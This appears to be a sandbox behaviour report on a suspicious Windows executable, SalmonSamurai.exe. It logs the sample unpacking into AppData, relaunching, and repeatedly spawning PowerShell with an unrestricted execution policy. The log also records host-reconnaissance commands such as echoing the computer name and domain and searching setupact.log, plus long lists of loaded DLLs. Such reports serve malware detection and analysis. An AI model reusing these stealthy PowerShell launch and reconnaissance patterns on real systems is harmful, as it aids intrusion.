Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1836 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe "C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\jwsvgxfvwjmqrcpj" --mojo-platform-channel-handle=2072 --field-trial-handle=1840,i,2950987413084556284,14321838366694710053,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"Jump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: sspicli.dllJump to behavior
